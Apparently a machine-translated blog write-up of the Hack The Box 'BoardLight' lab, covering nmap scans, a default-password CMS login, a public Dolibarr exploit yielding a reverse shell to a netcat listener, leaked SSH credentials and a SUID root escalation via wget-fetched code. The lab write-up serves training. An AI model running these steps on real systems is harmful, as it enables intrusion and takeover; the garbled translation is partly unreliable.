Location>code7788 >text

HTB-BoardLight Target Machine Notes

Popularity:285 ℃/2024-08-18 23:18:05

BoardLight Target Notes

summarize

HTB's target machine BoardLight

Target machine address:/machines/BoardLight

I. nmap scanning

1) Port scanning

-sT tcp full connection scan --min-rate Scan at minimum rate of 10000 -p- Scan full port

sudo nmap -sT --min-rate 10000 -p- -o ports 10.10.11.11
Warning: 10.10.11.11 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.11
Host is up (0.23s latency).
Not shown: 41074 closed tcp ports (conn-refused), 24459 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Aug 17 20:10:36 2024 -- 1 IP address (1 host up) scanned in 100.49 seconds

2) Detail Detection

-sT tcp full connection scan -sV detect port service version -sC scan using default script -O detect target operating system

sudo nmap -sT -sV -sC -O -p22,80 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.36s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
|   256 5903dc52873a359934447433783135fb (ECDSA)
|_  256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Sat Aug 17 20:12:43 2024 -- 1 IP address (1 host up) scanned in 44.29 seconds

3) Vulnerable Script Scanning

sudo nmap --script=vuln -o vuln 10.10.11.11 
Nmap scan report for 10.10.11.11          
Host is up (0.46s latency).          
Not shown: 998 closed tcp ports (reset)                     
PORT   STATE SERVICE                              
22/tcp open  ssh                          
80/tcp open  http   
| http-csrf:                                                                                                         [0/105]
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.11
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|_    Form action: 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

# Nmap done at Sat Aug 17 20:16:04 2024 -- 1 IP address (1 host up) scanned in 156.22 seconds

II. Web Penetration

1) Domain Discovery

image-20240818221856981

Discover domain names at the bottomput into (writing)/etc/hostsPapers

sudo echo "10.10.11.11 " | sudo tee -a /etc/hosts 

put him onsmall thingdomain name blastingcap (a poem)catalog bursting

Blasting virgin domains,htbput into (writing)/etc/hostsfile

interviews


image-20240818222440747

Saw a cms framework that tries weak passwordsadmin:admin

Log in.

image-20240818222622292

III. Gaining a foothold

Search via google

Found it.Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

According to the utilization tutorial on the side of github

kali local

nc -lvvp 4444

Utilizing scripts

python3   admin admin 10.10.14.69 4444

Successful shell bounce

image-20240818224015384

Find the configuration file

image-20240818224351276

Found a set of credentials.

Look at the user

ls /home

larissa

ssh credentialslarissa:serverfun2$2023!!

Connect to ssh to get a normal user

ssh [email protected]

image-20240818224727458

IV. Lifting power to root

find / -perm -4000 -type f 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

see thatenlightenment_sysHe's got a SUID extraction vulnerability.

CVE-2022–37706

We download kail, start a php service on port 80, download it with wget on the target machine, and execute it to root.

image-20240818225358375

Get the root flag.

summarize

  1. Scanning through nmap reveals that the target machine has ports 22 and 80 open.
  2. Directory bursting and subdomain bursting was performed on the http service on port 80, and the doblarr cms framework was found, and the exploit script for the Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 vulnerability was found through a google search.
  3. The shell was successfully obtained by exploiting a vulnerability in the cms, and by reading the configuration, a set of credentials was foundlarissa:serverfun2$2023!!The user's shell has been successfully obtained.
  4. The root shell was successfully obtained through the utilization of the SUID of the desktop management component, enlightenment.